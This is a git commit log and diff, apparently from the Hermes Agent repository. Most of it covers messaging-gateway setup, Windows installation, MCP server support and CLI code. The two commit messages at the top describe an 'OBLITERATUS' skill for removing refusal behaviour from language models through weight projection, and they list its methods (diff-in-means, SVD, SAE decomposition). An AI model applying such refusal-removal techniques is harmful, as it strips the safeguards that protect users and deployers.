fix: correct method count and analysis module count per creator review

Fixes based on feedback from OBLITERATUS creator: - CLI only accepts 9 methods (basic, advanced, aggressive, spectral_cascade, informed, surgical, optimized, inverted, nuclear). The 4 reproduction methods (failspy, gabliteration, heretic, rdo) are Python-API-only and will be rejected by argparse. Separated into 'CLI Methods' and 'Python-API-Only Methods' sections with clear warnings. - Analysis module count corrected from 27 to 15, matching the README. The analysis/ directory has 24+ .py files but includes utilities, visualization helpers, and __init__.py beyond the 15 core modules. - Description broadened from 'SVD-based weight projection' to 'mechanistic interpretability techniques (diff-in-means, SVD, whitened SVD, SAE decomposition, etc.)' to better represent the method diversity. - Telemetry notice clarified: CLI defaults to OFF, opt-in via OBLITERATUS_TELEMETRY=1 or --contribute flag.
feat: add OBLITERATUS skill for LLM refusal removal via SVD-based weight projection
2026-05-07 19:26:56 +08:00 · 2026-03-04 18:07:18 -08:00 · 2026-03-04 17:19:23 -08:00 · 2026-03-04 16:37:00 -08:00 · 2026-03-04 16:26:53 -08:00 · 2026-03-04 16:25:09 -08:00
90 changed files with 12329 additions and 482 deletions
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -235,6 +235,7 @@ The unified `hermes` command provides all functionality:
 | `hermes update` | Update to latest (checks for new config) |
 | `hermes uninstall` | Uninstall (can keep configs for reinstall) |
 | `hermes gateway` | Start gateway (messaging + cron scheduler) |
+| `hermes gateway setup` | Configure messaging platforms interactively |
 | `hermes gateway install` | Install gateway as system service |
 | `hermes cron list` | View scheduled jobs |
 | `hermes cron status` | Check if cron scheduler is running |
@@ -245,7 +246,19 @@ The unified `hermes` command provides all functionality:

 ## Messaging Gateway

-The gateway connects Hermes to Telegram, Discord, and WhatsApp.
+The gateway connects Hermes to Telegram, Discord, Slack, and WhatsApp.
+
+### Setup
+
+The interactive setup wizard handles platform configuration:
+
+```bash
+hermes gateway setup      # Arrow-key menu of all platforms, configure tokens/allowlists/home channels
+```
+
+This is the recommended way to configure messaging. It shows which platforms are already set up, walks through each one interactively, and offers to start/restart the gateway service at the end.
+
+Platforms can also be configured manually in `~/.hermes/.env`:

 ### Configuration (in `~/.hermes/.env`):

--- a/README.md
+++ b/README.md
@@ -32,7 +32,7 @@ Built by [Nous Research](https://nousresearch.com). Under the hood, the same arc

 ## Quick Install

-**Linux/macOS:**
+**Linux / macOS / WSL:**
 ```bash
 curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.sh | bash
 ```
@@ -42,18 +42,25 @@ curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scri
 irm https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.ps1 | iex
 ```

+**Windows (CMD):**
+```cmd
+curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.cmd -o install.cmd && install.cmd && del install.cmd
+```
+
+> **Windows note:** [Git for Windows](https://git-scm.com/download/win) is required. Hermes uses Git Bash internally for shell commands.
+
 The installer will:
 - Install [uv](https://docs.astral.sh/uv/) (fast Python package manager) if not present
 - Install Python 3.11 via uv if not already available (no sudo needed)
 - Clone to `~/.hermes/hermes-agent` (with submodules: mini-swe-agent, tinker-atropos)
 - Create a virtual environment with Python 3.11
 - Install all dependencies and submodule packages
- Symlink `hermes` into `~/.local/bin` so it works globally (no venv activation needed)
+- Set up the `hermes` command globally (no venv activation needed)
 - Run the interactive setup wizard

 After installation, reload your shell and run:
 ```bash
-source ~/.bashrc   # or: source ~/.zshrc
+source ~/.bashrc   # or: source ~/.zshrc  (Windows: restart your terminal)
 hermes setup       # Configure API keys (if you skipped during install)
 hermes             # Start chatting!
 ```
@@ -213,26 +220,36 @@ See [OpenRouter provider routing docs](https://openrouter.ai/docs/guides/routing

 Chat with Hermes from Telegram, Discord, Slack, or WhatsApp. The gateway is a single background process that connects to all your configured platforms, handles sessions, runs cron jobs, and delivers voice messages.

-### Starting the Gateway
+### Setting Up Messaging Platforms
+
+The easiest way to configure messaging platforms is the interactive setup wizard:
+
+```bash
+hermes gateway setup        # Interactive setup for all messaging platforms
+```
+
+This walks you through configuring each platform with arrow-key selection, shows which platforms are already configured, and offers to start/restart the gateway service when you're done.
+
+You can also configure platforms manually by editing `~/.hermes/.env` directly (see platform-specific details below).
+
+### Gateway Commands

 ```bash
 hermes gateway              # Run in foreground
-hermes gateway install      # Install as systemd service (Linux)
-hermes gateway start        # Start the systemd service
-hermes gateway stop         # Stop the systemd service
+hermes gateway setup        # Configure messaging platforms interactively
+hermes gateway install      # Install as systemd service (Linux) / launchd (macOS)
+hermes gateway start        # Start the service
+hermes gateway stop         # Stop the service
 hermes gateway status       # Check service status
 ```

-The installer will offer to set this up automatically if it detects a bot token.
-
 ### Telegram Setup

 1. **Create a bot:** Message [@BotFather](https://t.me/BotFather) on Telegram, use `/newbot`
 2. **Get your user ID:** Message [@userinfobot](https://t.me/userinfobot) — it replies with your numeric ID
-3. **Configure:**
+3. **Configure:** Run `hermes gateway setup` and select Telegram, or add to `~/.hermes/.env` manually:

 ```bash
-# Add to ~/.hermes/.env:
 TELEGRAM_BOT_TOKEN=123456:ABC-DEF...
 TELEGRAM_ALLOWED_USERS=YOUR_USER_ID    # Comma-separated for multiple users
 ```
@@ -245,10 +262,9 @@ TELEGRAM_ALLOWED_USERS=YOUR_USER_ID    # Comma-separated for multiple users
 2. **Enable intents:** Bot → Privileged Gateway Intents → enable Message Content Intent
 3. **Get your user ID:** Enable Developer Mode in Discord settings, right-click your name → Copy ID
 4. **Invite to your server:** OAuth2 → URL Generator → scopes: `bot`, `applications.commands` → permissions: Send Messages, Read Message History, Attach Files
-5. **Configure:**
+5. **Configure:** Run `hermes gateway setup` and select Discord, or add to `~/.hermes/.env` manually:

 ```bash
-# Add to ~/.hermes/.env:
 DISCORD_BOT_TOKEN=MTIz...
 DISCORD_ALLOWED_USERS=YOUR_USER_ID
 ```
@@ -260,10 +276,9 @@ DISCORD_ALLOWED_USERS=YOUR_USER_ID
 3. **Get tokens:**
   - Bot Token (`xoxb-...`): OAuth & Permissions → Install to Workspace
   - App Token (`xapp-...`): Basic Information → App-Level Tokens → Generate
-4. **Configure:**
+4. **Configure:** Run `hermes gateway setup` and select Slack, or add to `~/.hermes/.env` manually:

 ```bash
-# Add to ~/.hermes/.env:
 SLACK_BOT_TOKEN=xoxb-...
 SLACK_APP_TOKEN=xapp-...
 SLACK_ALLOWED_USERS=U01234ABCDE    # Comma-separated Slack user IDs
@@ -271,22 +286,30 @@ SLACK_ALLOWED_USERS=U01234ABCDE    # Comma-separated Slack user IDs

 ### WhatsApp Setup

-WhatsApp doesn't have a simple bot API like Telegram or Discord. Hermes includes a built-in bridge using [Baileys](https://github.com/WhiskeySockets/Baileys) that connects via WhatsApp Web. The agent links to your WhatsApp account and responds to incoming messages.
+WhatsApp doesn't have a simple bot API like Telegram or Discord. Hermes includes a built-in bridge using [Baileys](https://github.com/WhiskeySockets/Baileys) that connects via WhatsApp Web.

-1. **Run the setup command:**
+**Two modes are supported:**
+
+| Mode | How it works | Best for |
+|------|-------------|----------|
+| **Separate bot number** (recommended) | Dedicate a phone number to the bot. People message that number directly. | Clean UX, multiple users |
+| **Personal self-chat** | Use your own WhatsApp. You message yourself to talk to the agent. | Quick setup, single user |
+
+**Setup:**

 ```bash
 hermes whatsapp
 ```

-This will:
- Enable WhatsApp in your config
- Ask for your phone number (for the allowlist)
- Install bridge dependencies (Node.js required)
- Display a QR code — scan it with your phone (WhatsApp → Settings → Linked Devices → Link a Device)
- Exit automatically once paired
+The wizard will:
+1. Ask which mode you want
+2. For **bot mode**: guide you through getting a second number (WhatsApp Business app on a dual-SIM, Google Voice, or cheap prepaid SIM)
+3. Configure the allowlist
+4. Install bridge dependencies (Node.js required)
+5. Display a QR code — scan from WhatsApp (or WhatsApp Business) → Settings → Linked Devices → Link a Device
+6. Exit once paired

-2. **Start the gateway:**
+**Start the gateway:**

 ```bash
 hermes gateway            # Foreground
@@ -295,7 +318,7 @@ hermes gateway install    # Or install as a system service (Linux)

 The gateway starts the WhatsApp bridge automatically using the saved session.

-> **Note:** WhatsApp Web sessions can disconnect if WhatsApp updates their protocol. The gateway reconnects automatically. If you see persistent failures, re-pair with `hermes whatsapp`. Agent responses are prefixed with "⚕ Hermes Agent" so you can distinguish them from your own messages in self-chat.
+> **Note:** WhatsApp Web sessions can disconnect if WhatsApp updates their protocol. The gateway reconnects automatically. If you see persistent failures, re-pair with `hermes whatsapp`. Agent responses are prefixed with "⚕ Hermes Agent" for easy identification.

 See [docs/messaging.md](docs/messaging.md) for advanced WhatsApp configuration.

@@ -408,6 +431,7 @@ hermes uninstall          # Uninstall (can keep configs for later reinstall)

 # Gateway (messaging + cron scheduler)
 hermes gateway            # Run gateway in foreground
+hermes gateway setup      # Configure messaging platforms interactively
 hermes gateway install    # Install as system service (messaging + cron)
 hermes gateway status     # Check service status
 hermes whatsapp           # Pair WhatsApp via QR code
@@ -488,6 +512,23 @@ hermes tools

 **Available toolsets:** `web`, `terminal`, `file`, `browser`, `vision`, `image_gen`, `moa`, `skills`, `tts`, `todo`, `memory`, `session_search`, `cronjob`, `code_execution`, `delegation`, `clarify`, and more.

+### 🔌 MCP (Model Context Protocol)
+
+Connect to any MCP-compatible server to extend Hermes with external tools. Just add servers to your config:
+
+```yaml
+mcp_servers:
+  time:
+    command: uvx
+    args: ["mcp-server-time"]
+  notion:
+    url: https://mcp.notion.com/mcp
+```
+
+Supports stdio and HTTP transports, auto-reconnection, and env var filtering. See [docs/mcp.md](docs/mcp.md) for details.
+
+Install MCP support: `pip install hermes-agent[mcp]`
+
 ### 🖥️ Terminal & Process Management

 The terminal tool can execute commands in different environments, with full background process management via the `process` tool:
@@ -1212,8 +1253,8 @@ brew install git
 brew install ripgrep node
 ```

-**Windows (WSL recommended):**
-Use the [Windows Subsystem for Linux](https://learn.microsoft.com/en-us/windows/wsl/install) and follow the Ubuntu instructions above. Alternatively, use the PowerShell quick-install script at the top of this README.
+**Windows (native):**
+Hermes runs natively on Windows using [Git for Windows](https://git-scm.com/download/win) (which provides Git Bash for shell commands). Install Git for Windows first, then use the PowerShell or CMD quick-install command at the top of this README. WSL also works — follow the Ubuntu instructions above.

 </details>

@@ -1635,6 +1676,7 @@ All variables go in `~/.hermes/.env`. Run `hermes config set VAR value` to set t
 | `SLACK_ALLOWED_USERS` | Comma-separated Slack user IDs |
 | `SLACK_HOME_CHANNEL` | Default Slack channel for cron delivery |
 | `WHATSAPP_ENABLED` | Enable WhatsApp bridge (`true`/`false`) |
+| `WHATSAPP_MODE` | `bot` (separate number, recommended) or `self-chat` (message yourself) |
 | `WHATSAPP_ALLOWED_USERS` | Comma-separated phone numbers (with country code) |
 | `MESSAGING_CWD` | Working directory for terminal in messaging (default: ~) |
 | `GATEWAY_ALLOW_ALL_USERS` | Allow all users without allowlist (`true`/`false`, default: `false`) |
--- a/TODO.md
+++ b/TODO.md
@@ -63,33 +63,27 @@ Full Python plugin interface that goes beyond the current hook system.
 - `hermes plugin list|install|uninstall|create` CLI commands
 - Plugin discovery and validation on startup

-### Phase 3: MCP support (industry standard)
- MCP client that can connect to external MCP servers (stdio, SSE, HTTP)
- This is the big one -- Codex, Cline, and OpenCode all support MCP
- Allows Hermes to use any MCP-compatible tool server (hundreds exist)
- Config: `mcp_servers` list in config.yaml with connection details
- Each MCP server's tools get registered as a new toolset
+### Phase 3: MCP support (industry standard) ✅ DONE
+- ✅ MCP client that connects to external MCP servers (stdio + HTTP/StreamableHTTP)
+- ✅ Config: `mcp_servers` in config.yaml with connection details
+- ✅ Each MCP server's tools auto-registered as a dynamic toolset
+- Future: Resources, Prompts, Progress notifications, `hermes mcp` CLI command

 ---

-## 6. MCP (Model Context Protocol) Support 🔗
+## 6. MCP (Model Context Protocol) Support 🔗 ✅ DONE

-**Status:** Not started
-**Priority:** High -- this is becoming an industry standard
+**Status:** Implemented (PR #301)
+**Priority:** Complete

-MCP is the protocol that Codex, Cline, and OpenCode all support for connecting to external tool servers. Supporting MCP would instantly give Hermes access to hundreds of community tool servers.
+Native MCP client support with stdio and HTTP/StreamableHTTP transports, auto-discovery, reconnection with exponential backoff, env var filtering, and credential stripping. See `docs/mcp.md` for full documentation.

-**What other agents do:**
- **Codex**: Full MCP integration with skill dependencies
- **Cline**: `use_mcp_tool` / `access_mcp_resource` / `load_mcp_documentation` tools
- **OpenCode**: MCP client support (stdio, SSE, StreamableHTTP transports), OAuth auth
-
-**Our approach:**
- Implement an MCP client that can connect to external MCP servers
- Config: list of MCP servers in `~/.hermes/config.yaml` with transport type and connection details
- Each MCP server's tools auto-registered as a dynamic toolset
- Start with stdio transport (most common), then add SSE and HTTP
- Could also be part of the Plugin system (#5, Phase 3) since MCP is essentially a plugin protocol
+**Still TODO:**
+- `hermes mcp` CLI subcommand (list/test/status)
+- `hermes tools` UI integration for MCP toolsets
+- MCP Resources and Prompts support
+- OAuth authentication for remote servers
+- Progress notifications for long-running tools

 ---

@@ -121,7 +115,7 @@ Automatic filesystem snapshots after each agent loop iteration so the user can r

 ### Tier 1: Next Up

-1. MCP Support -- #6
+1. ~~MCP Support -- #6~~ ✅ Done (PR #301)

 ### Tier 2: Quality of Life

--- a/agent/display.py
+++ b/agent/display.py
@@ -31,6 +31,8 @@ def build_tool_preview(tool_name: str, args: dict, max_len: int = 40) -> str:
        "vision_analyze": "question", "mixture_of_agents": "user_prompt",
        "skill_view": "name", "skills_list": "category",
        "schedule_cronjob": "name",
+        "execute_code": "code", "delegate_task": "goal",
+        "clarify": "question", "skill_manage": "name",
    }

    if tool_name == "process":
@@ -97,7 +99,7 @@ def build_tool_preview(tool_name: str, args: dict, max_len: int = 40) -> str:

    key = primary_args.get(tool_name)
    if not key:
-        for fallback_key in ("query", "text", "command", "path", "name", "prompt"):
+        for fallback_key in ("query", "text", "command", "path", "name", "prompt", "code", "goal"):
            if fallback_key in args:
                key = fallback_key
                break
--- a/cli-config.yaml.example
+++ b/cli-config.yaml.example
@@ -120,10 +120,10 @@ terminal:
 # --- Container resource limits (docker, singularity, modal -- ignored for local/ssh) ---
 # These settings apply to all container backends. They control the resources
 # allocated to the sandbox and whether its filesystem persists across sessions.
-#   container_cpu: 1              # CPU cores (default: 1)
-#   container_memory: 5120        # Memory in MB (default: 5120 = 5GB)
-#   container_disk: 51200         # Disk in MB (default: 51200 = 50GB)
-#   container_persistent: true    # Persist filesystem across sessions (default: true)
+  container_cpu: 1              # CPU cores
+  container_memory: 5120        # Memory in MB (5120 = 5GB)
+  container_disk: 51200         # Disk in MB (51200 = 50GB)
+  container_persistent: true    # Persist filesystem across sessions (false = ephemeral)

 # -----------------------------------------------------------------------------
 # SUDO SUPPORT (works with ALL backends above)
@@ -442,6 +442,41 @@ toolsets:
 # toolsets:
 #   - safe

+# =============================================================================
+# MCP (Model Context Protocol) Servers
+# =============================================================================
+# Connect to external MCP servers to add tools from the MCP ecosystem.
+# Each server's tools are automatically discovered and registered.
+# See docs/mcp.md for full documentation.
+#
+# Stdio servers (spawn a subprocess):
+#   command: the executable to run
+#   args: command-line arguments
+#   env: environment variables (only these + safe defaults passed to subprocess)
+#
+# HTTP servers (connect to a URL):
+#   url: the MCP server endpoint
+#   headers: HTTP headers (e.g., for authentication)
+#
+# Optional per-server settings:
+#   timeout: tool call timeout in seconds (default: 120)
+#   connect_timeout: initial connection timeout (default: 60)
+#
+# mcp_servers:
+#   time:
+#     command: uvx
+#     args: ["mcp-server-time"]
+#   filesystem:
+#     command: npx
+#     args: ["-y", "@modelcontextprotocol/server-filesystem", "/home/user"]
+#   notion:
+#     url: https://mcp.notion.com/mcp
+#   github:
+#     command: npx
+#     args: ["-y", "@modelcontextprotocol/server-github"]
+#     env:
+#       GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_..."
+
 # =============================================================================
 # Voice Transcription (Speech-to-Text)
 # =============================================================================
--- a/cli.py
+++ b/cli.py
@@ -386,6 +386,11 @@ def _run_cleanup():
        _cleanup_all_browsers()
    except Exception:
        pass
+    try:
+        from tools.mcp_tool import shutdown_mcp_servers
+        shutdown_mcp_servers()
+    except Exception:
+        pass

 # ============================================================================
 # ASCII Art & Branding
@@ -685,6 +690,7 @@ COMMANDS = {
    "/cron": "Manage scheduled tasks (list, add, remove)",
    "/skills": "Search, install, inspect, or manage skills from online registries",
    "/platforms": "Show gateway/messaging platform status",
+    "/reload-mcp": "Reload MCP servers from config.yaml",
    "/quit": "Exit the CLI (also: /exit, /q)",
 }

@@ -847,7 +853,7 @@ class HermesCLI:
            or os.getenv("OPENAI_BASE_URL")
            or os.getenv("OPENROUTER_BASE_URL", CLI_CONFIG["model"]["base_url"])
        )
-        self.api_key = api_key or os.getenv("OPENAI_API_KEY") or os.getenv("OPENROUTER_API_KEY")
+        self.api_key = api_key or os.getenv("OPENROUTER_API_KEY") or os.getenv("OPENAI_API_KEY")
        self._nous_key_expires_at: Optional[str] = None
        self._nous_key_source: Optional[str] = None
        # Max turns priority: CLI arg > config file > env var > default
@@ -916,6 +922,15 @@ class HermesCLI:
        
        # History file for persistent input recall across sessions
        self._history_file = Path.home() / ".hermes_history"
+        self._last_invalidate: float = 0.0  # throttle UI repaints
+
+    def _invalidate(self, min_interval: float = 0.25) -> None:
+        """Throttled UI repaint — prevents terminal blinking on slow/SSH connections."""
+        import time as _time
+        now = _time.monotonic()
+        if hasattr(self, "_app") and self._app and (now - self._last_invalidate) >= min_interval:
+            self._last_invalidate = now
+            self._app.invalidate()

    def _ensure_runtime_credentials(self) -> bool:
        """
@@ -1756,6 +1771,8 @@ class HermesCLI:
            self._manual_compress()
        elif cmd_lower == "/usage":
            self._show_usage()
+        elif cmd_lower == "/reload-mcp":
+            self._reload_mcp()
        else:
            # Check for skill slash commands (/gif-search, /axolotl, etc.)
            base_cmd = cmd_lower.split()[0]
@@ -1877,6 +1894,91 @@ class HermesCLI:
            for quiet_logger in ('tools', 'minisweagent', 'run_agent', 'trajectory_compressor', 'cron', 'hermes_cli'):
                logging.getLogger(quiet_logger).setLevel(logging.ERROR)

+    def _reload_mcp(self):
+        """Reload MCP servers: disconnect all, re-read config.yaml, reconnect.
+
+        After reconnecting, refreshes the agent's tool list so the model
+        sees the updated tools on the next turn.
+        """
+        try:
+            from tools.mcp_tool import shutdown_mcp_servers, discover_mcp_tools, _load_mcp_config, _servers, _lock
+
+            # Capture old server names
+            with _lock:
+                old_servers = set(_servers.keys())
+
+            print("🔄 Reloading MCP servers...")
+
+            # Shutdown existing connections
+            shutdown_mcp_servers()
+
+            # Reconnect (reads config.yaml fresh)
+            new_tools = discover_mcp_tools()
+
+            # Compute what changed
+            with _lock:
+                connected_servers = set(_servers.keys())
+
+            added = connected_servers - old_servers
+            removed = old_servers - connected_servers
+            reconnected = connected_servers & old_servers
+
+            if reconnected:
+                print(f"  ♻️  Reconnected: {', '.join(sorted(reconnected))}")
+            if added:
+                print(f"  ➕ Added: {', '.join(sorted(added))}")
+            if removed:
+                print(f"  ➖ Removed: {', '.join(sorted(removed))}")
+            if not connected_servers:
+                print("  No MCP servers connected.")
+            else:
+                print(f"  🔧 {len(new_tools)} tool(s) available from {len(connected_servers)} server(s)")
+
+            # Refresh the agent's tool list so the model can call new tools
+            if self.agent is not None:
+                from model_tools import get_tool_definitions
+                self.agent.tools = get_tool_definitions(
+                    enabled_toolsets=self.agent.enabled_toolsets
+                    if hasattr(self.agent, "enabled_toolsets") else None,
+                    quiet_mode=True,
+                )
+                self.agent.valid_tool_names = {
+                    tool["function"]["name"] for tool in self.agent.tools
+                } if self.agent.tools else set()
+
+            # Inject a message at the END of conversation history so the
+            # model knows tools changed.  Appended after all existing
+            # messages to preserve prompt-cache for the prefix.
+            change_parts = []
+            if added:
+                change_parts.append(f"Added servers: {', '.join(sorted(added))}")
+            if removed:
+                change_parts.append(f"Removed servers: {', '.join(sorted(removed))}")
+            if reconnected:
+                change_parts.append(f"Reconnected servers: {', '.join(sorted(reconnected))}")
+            tool_summary = f"{len(new_tools)} MCP tool(s) now available" if new_tools else "No MCP tools available"
+            change_detail = ". ".join(change_parts) + ". " if change_parts else ""
+            self.conversation_history.append({
+                "role": "user",
+                "content": f"[SYSTEM: MCP servers have been reloaded. {change_detail}{tool_summary}. The tool list for this conversation has been updated accordingly.]",
+            })
+
+            # Persist session immediately so the session log reflects the
+            # updated tools list (self.agent.tools was refreshed above).
+            if self.agent is not None:
+                try:
+                    self.agent._persist_session(
+                        self.conversation_history,
+                        self.conversation_history,
+                    )
+                except Exception:
+                    pass  # Best-effort
+
+            print(f"  ✅ Agent updated — {len(self.agent.tools if self.agent else [])} tool(s) available")
+
+        except Exception as e:
+            print(f"  ❌ MCP reload failed: {e}")
+
    def _clarify_callback(self, question, choices):
        """
        Platform callback for the clarify tool. Called from the agent thread.
@@ -1903,8 +2005,7 @@ class HermesCLI:
        self._clarify_freetext = is_open_ended

        # Trigger prompt_toolkit repaint from this (non-main) thread
-        if hasattr(self, '_app') and self._app:
-            self._app.invalidate()
+        self._invalidate()

        # Poll in 1-second ticks so the countdown refreshes in the UI.
        # Each tick triggers an invalidate() to repaint the hint line.
@@ -1918,15 +2019,13 @@ class HermesCLI:
                if remaining <= 0:
                    break
                # Repaint so the countdown updates
-                if hasattr(self, '_app') and self._app:
-                    self._app.invalidate()
+                self._invalidate()

        # Timed out — tear down the UI and let the agent decide
        self._clarify_state = None
        self._clarify_freetext = False
        self._clarify_deadline = 0
-        if hasattr(self, '_app') and self._app:
-            self._app.invalidate()
+        self._invalidate()
        _cprint(f"\n{_DIM}(clarify timed out after {timeout}s — agent will decide){_RST}")
        return (
            "The user did not provide a response within the time limit. "
@@ -1951,16 +2050,14 @@ class HermesCLI:
        }
        self._sudo_deadline = _time.monotonic() + timeout

-        if hasattr(self, '_app') and self._app:
-            self._app.invalidate()
+        self._invalidate()

        while True:
            try:
                result = response_queue.get(timeout=1)
                self._sudo_state = None
                self._sudo_deadline = 0
-                if hasattr(self, '_app') and self._app:
-                    self._app.invalidate()
+                self._invalidate()
                if result:
                    _cprint(f"\n{_DIM}  ✓ Password received (cached for session){_RST}")
                else:
@@ -1970,13 +2067,11 @@ class HermesCLI:
                remaining = self._sudo_deadline - _time.monotonic()
                if remaining <= 0:
                    break
-                if hasattr(self, '_app') and self._app:
-                    self._app.invalidate()
+                self._invalidate()

        self._sudo_state = None
        self._sudo_deadline = 0
-        if hasattr(self, '_app') and self._app:
-            self._app.invalidate()
+        self._invalidate()
        _cprint(f"\n{_DIM}  ⏱ Timeout — continuing without sudo{_RST}")
        return ""

@@ -2002,28 +2097,24 @@ class HermesCLI:
        }
        self._approval_deadline = _time.monotonic() + timeout

-        if hasattr(self, '_app') and self._app:
-            self._app.invalidate()
+        self._invalidate()

        while True:
            try:
                result = response_queue.get(timeout=1)
                self._approval_state = None
                self._approval_deadline = 0
-                if hasattr(self, '_app') and self._app:
-                    self._app.invalidate()
+                self._invalidate()
                return result
            except queue.Empty:
                remaining = self._approval_deadline - _time.monotonic()
                if remaining <= 0:
                    break
-                if hasattr(self, '_app') and self._app:
-                    self._app.invalidate()
+                self._invalidate()

        self._approval_state = None
        self._approval_deadline = 0
-        if hasattr(self, '_app') and self._app:
-            self._app.invalidate()
+        self._invalidate()
        _cprint(f"\n{_DIM}  ⏱ Timeout — denying command{_RST}")
        return "deny"

@@ -2287,7 +2378,7 @@ class HermesCLI:
                    self._interrupt_queue.put(text)
                else:
                    self._pending_input.put(text)
-                event.app.current_buffer.reset()
+                event.app.current_buffer.reset(append_to_history=True)
        
        @kb.add('escape', 'enter')
        def handle_alt_enter(event):
@@ -2332,6 +2423,24 @@ class HermesCLI:
                self._approval_state["selected"] = min(max_idx, self._approval_state["selected"] + 1)
                event.app.invalidate()

+        # --- History navigation: up/down browse history in normal input mode ---
+        # The TextArea is multiline, so by default up/down only move the cursor.
+        # Buffer.auto_up/auto_down handle both: cursor movement when multi-line,
+        # history browsing when on the first/last line (or single-line input).
+        _normal_input = Condition(
+            lambda: not self._clarify_state and not self._approval_state and not self._sudo_state
+        )
+
+        @kb.add('up', filter=_normal_input)
+        def history_up(event):
+            """Up arrow: browse history when on first line, else move cursor up."""
+            event.app.current_buffer.auto_up(count=event.arg)
+
+        @kb.add('down', filter=_normal_input)
+        def history_down(event):
+            """Down arrow: browse history when on last line, else move cursor down."""
+            event.app.current_buffer.auto_down(count=event.arg)
+
        @kb.add('c-c')
        def handle_ctrl_c(event):
            """Handle Ctrl+C - cancel interactive prompts, interrupt agent, or exit.
--- a/docs/mcp.md
+++ b/docs/mcp.md
@@ -0,0 +1,527 @@
+# MCP (Model Context Protocol) Support
+
+MCP lets Hermes Agent connect to external tool servers — giving the agent access to databases, APIs, filesystems, and more without any code changes.
+
+## Overview
+
+The [Model Context Protocol](https://modelcontextprotocol.io/) (MCP) is an open standard for connecting AI agents to external tools and data sources. MCP servers expose tools over a lightweight RPC protocol, and Hermes Agent can connect to any compliant server automatically.
+
+What this means for you:
+
+- **Thousands of ready-made tools** — browse the [MCP server directory](https://github.com/modelcontextprotocol/servers) for servers covering GitHub, Slack, databases, file systems, web scraping, and more.
+- **No code changes needed** — add a few lines to `~/.hermes/config.yaml` and the tools appear alongside built-in ones.
+- **Mix and match** — run multiple MCP servers simultaneously, combining stdio-based and HTTP-based servers.
+- **Secure by default** — environment variables are filtered and credentials are stripped from error messages returned to the LLM.
+
+## Prerequisites
+
+Install MCP support as an optional dependency:
+
+```bash
+pip install hermes-agent[mcp]
+```
+
+Depending on which MCP servers you want to use, you may need additional runtimes:
+
+| Server Type | Runtime Needed | Example |
+|-------------|---------------|---------|
+| HTTP/remote | Nothing extra | `url: "https://mcp.example.com"` |
+| npm-based (npx) | Node.js 18+ | `command: "npx"` |
+| Python-based | uv (recommended) | `command: "uvx"` |
+
+Most popular MCP servers are distributed as npm packages and launched via `npx`. Python-based servers typically use `uvx` (from the [uv](https://docs.astral.sh/uv/) package manager).
+
+## Configuration
+
+MCP servers are configured in `~/.hermes/config.yaml` under the `mcp_servers` key. Each entry is a named server with its connection details.
+
+### Stdio Servers (command + args + env)
+
+Stdio servers run as local subprocesses. Communication happens over stdin/stdout.
+
+```yaml
+mcp_servers:
+  filesystem:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-filesystem", "/home/user/projects"]
+    env: {}
+
+  github:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-github"]
+    env:
+      GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_xxxxxxxxxxxx"
+```
+
+| Key | Required | Description |
+|-----|----------|-------------|
+| `command` | Yes | Executable to run (e.g., `npx`, `uvx`, `python`) |
+| `args` | No | List of command-line arguments |
+| `env` | No | Environment variables to pass to the subprocess |
+
+**Note:** Only explicitly listed `env` variables plus a safe baseline (PATH, HOME, USER, LANG, SHELL, TMPDIR, XDG_*) are passed to the subprocess. Your shell's API keys, tokens, and secrets are **not** leaked. See [Security](#security) for details.
+
+### HTTP Servers (url + headers)
+
+HTTP servers run remotely and are accessed over HTTP/StreamableHTTP.
+
+```yaml
+mcp_servers:
+  remote_api:
+    url: "https://my-mcp-server.example.com/mcp"
+    headers:
+      Authorization: "Bearer sk-xxxxxxxxxxxx"
+```
+
+| Key | Required | Description |
+|-----|----------|-------------|
+| `url` | Yes | Full URL of the MCP HTTP endpoint |
+| `headers` | No | HTTP headers to include (e.g., auth tokens) |
+
+### Per-Server Timeouts
+
+Each server can have custom timeouts:
+
+```yaml
+mcp_servers:
+  slow_database:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-postgres"]
+    env:
+      DATABASE_URL: "postgres://user:pass@localhost/mydb"
+    timeout: 300          # Tool call timeout in seconds (default: 120)
+    connect_timeout: 90   # Initial connection timeout in seconds (default: 60)
+```
+
+| Key | Default | Description |
+|-----|---------|-------------|
+| `timeout` | 120 | Maximum seconds to wait for a single tool call to complete |
+| `connect_timeout` | 60 | Maximum seconds to wait for the initial connection and tool discovery |
+
+### Mixed Configuration Example
+
+You can combine stdio and HTTP servers freely:
+
+```yaml
+mcp_servers:
+  # Local filesystem access via stdio
+  filesystem:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-filesystem", "/tmp"]
+
+  # GitHub API via stdio with auth
+  github:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-github"]
+    env:
+      GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_xxxxxxxxxxxx"
+
+  # Remote database via HTTP
+  company_db:
+    url: "https://mcp.internal.company.com/db"
+    headers:
+      Authorization: "Bearer sk-xxxxxxxxxxxx"
+    timeout: 180
+
+  # Python-based server via uvx
+  memory:
+    command: "uvx"
+    args: ["mcp-server-memory"]
+```
+
+## Config Translation (Claude/Cursor JSON → Hermes YAML)
+
+Many MCP server docs show configuration in Claude Desktop JSON format. Here's how to translate:
+
+**Claude Desktop JSON** (`claude_desktop_config.json`):
+
+```json
+{
+  "mcpServers": {
+    "filesystem": {
+      "command": "npx",
+      "args": ["-y", "@modelcontextprotocol/server-filesystem", "/tmp"],
+      "env": {}
+    },
+    "github": {
+      "command": "npx",
+      "args": ["-y", "@modelcontextprotocol/server-github"],
+      "env": {
+        "GITHUB_PERSONAL_ACCESS_TOKEN": "ghp_xxxxxxxxxxxx"
+      }
+    }
+  }
+}
+```
+
+**Hermes Agent YAML** (`~/.hermes/config.yaml`):
+
+```yaml
+mcp_servers:                          # mcpServers → mcp_servers (snake_case)
+  filesystem:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-filesystem", "/tmp"]
+    env: {}
+  github:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-github"]
+    env:
+      GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_xxxxxxxxxxxx"
